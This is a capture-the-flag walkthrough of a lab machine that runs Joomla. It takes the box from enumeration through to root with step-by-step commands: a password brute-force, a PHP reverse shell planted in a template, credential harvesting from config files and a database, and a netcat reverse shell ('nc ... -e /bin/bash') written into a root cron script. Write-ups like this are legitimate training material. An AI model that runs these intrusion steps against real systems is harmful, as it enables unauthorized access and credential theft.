RATING
Hard
ENUMERATION
We kick things off with our nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.250.79
Navigating to our target in our browser doesn’t reveal much, so we proceed to directory bruteforce with feroxbuster and discover a couple of interesting entries, namely /joomla and /joomla/administrator:
Command: feroxbuster -u http://192.168.250.79/ -w /usr/share/wordlists/dirb/big.txt -k --quiet
Navigating to http://192.168.250.79/joomla, we see a blog entry. Nothing really interesting there except that we can use keywords in the blog to create a password list:
Using cewl, we can extract keywords to make a wordlist. We use -m 5 to eliminate words like “for” and “the”:
Command: cewl -m 5 http://192.168.250.79/joomla/ > pass.txt
Using nmap‘s http-joomla-brute script, we are able to bruteforce the password for the default user joomla:
Command: nmap -sV --script http-joomla-brute --script-args 'userdb=users.txt,passdb=pass.txt,http-joomla-brute.hostname=192.168.250.79,http-joomla-brute.uri=/joomla/administrator/index.php,http-joomla-brute.threads=3' -Pn 192.168.250.79
Navigating over to http://192.168.250.79/joomla/administrator, discovered earlier with feroxbuster, we find an admin login:
EXPLOITATION
After logging in with joomla:Gotham, we find ourselves at the joomla control panel:
Navigating to Extensions -> Templates -> Templates and choosing Protostar Details and Files, we are able to edit index.php, which means we can replace this with a php reverse shell:
Note: Please be aware that from this momemt on, the IP address of our target has changed here because I was having trouble with the box and had to come back to it at a later time.
After starting our netcat listener and navigating to http://192.168.219.79/joomla, we catch our reverse shell as user www-data and upgrade it:
Command: nc -nvlp 1234
Command: python -c 'import pty; pty.spawn("/bin/bash")'
Looking around the system, we find the /var/www/joomla2 directory and in particular, a file named configuration.php:
Viewing the contents of this file reveals a MySQL username and password and database name:
We are able to log into the MySQL instance using these credentials and listing the databases:
Command: mysql -ujoomla -pbabyjoker
Command: show databases;
We access the batjoke database and dump its tables and contents from the table taskforce:
Command: use batjoke;
Command: show tables;
Command: select * from taskforce;
We were able to dump some hashes and upon base64 decoding user rob‘s hash, we are able to extract the passphrase ???AllIHaveAreNegativeThoughts???:
Command: echo "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/" | base64 -d
With this passphrase, we are able to SSH into the target as user rob:
Command: ssh [email protected]
Looking around rob‘s home directory, we see the file Abnerineedyourhelp. Viewing its contents shows us a message that appears to be enciphered:
Command : ls -la
Command: cat Abnerineedyourhelp
We are able to decipher the message using CyberChef and reversing the ROT13 cipher:
We then grab the base64 encoded string at the end and decode it to reveal the passphrase I33hope99my0death000makes44more8cents00than0my0life0, this time for user abner:
Command: echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -d
With this passphrase, we are able to switch over to user abner:
Command: su abner
We use the find command to search for any interesting files owned by abner and discover the hidden file .dear_penguins.zip:
The zip file is password protected, but we can extract its contents using the same password I33hope99my0death000makes44more8cents00than0my0life0 and view its content to reveal another message and what looks like another passphrase scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz:
Command: unzip .dear_penguins.zip
We use this new passphrase to switch to user penguin:
Command: su penguin
PRIVILEGE ESCALATION
Looking through penguin’s home directory, we find the directory SomeoneWhoHidesBehindAMask. Inside this directory, we find a couple of files of interest, namely the PeopleAreStartingToNotice.txt file and the .trash_old file that is writable by us and owned by root:
Command: ls -la
Viewing the contents of PeopleAreStartingToNotice.txt, we see mention of some software that only runs with root permissions:
We know that the .trash_old file is owned by root and writable by us. Viewing its contents shows that it is an empty shell script:
Command: cat .trash_old
We transfer the pspy64 process monitor over from our local machine and run it:
Command: python3 -m http.server 80 (on attacker machine)
Command: wget http://192.168.45.153/pspy64 (on target machine)
Command: chmod +x pspy64
Command: ./pspy64
This reveals to us that .trash_old is running every minute:
We simply insert nc 192.168.45.153 1234 -e /bin/bash into the .trash_old script, set up our netcat listener and wait to catch our shell as root and read our proof.txt:
Command: nc -nvlp 1234
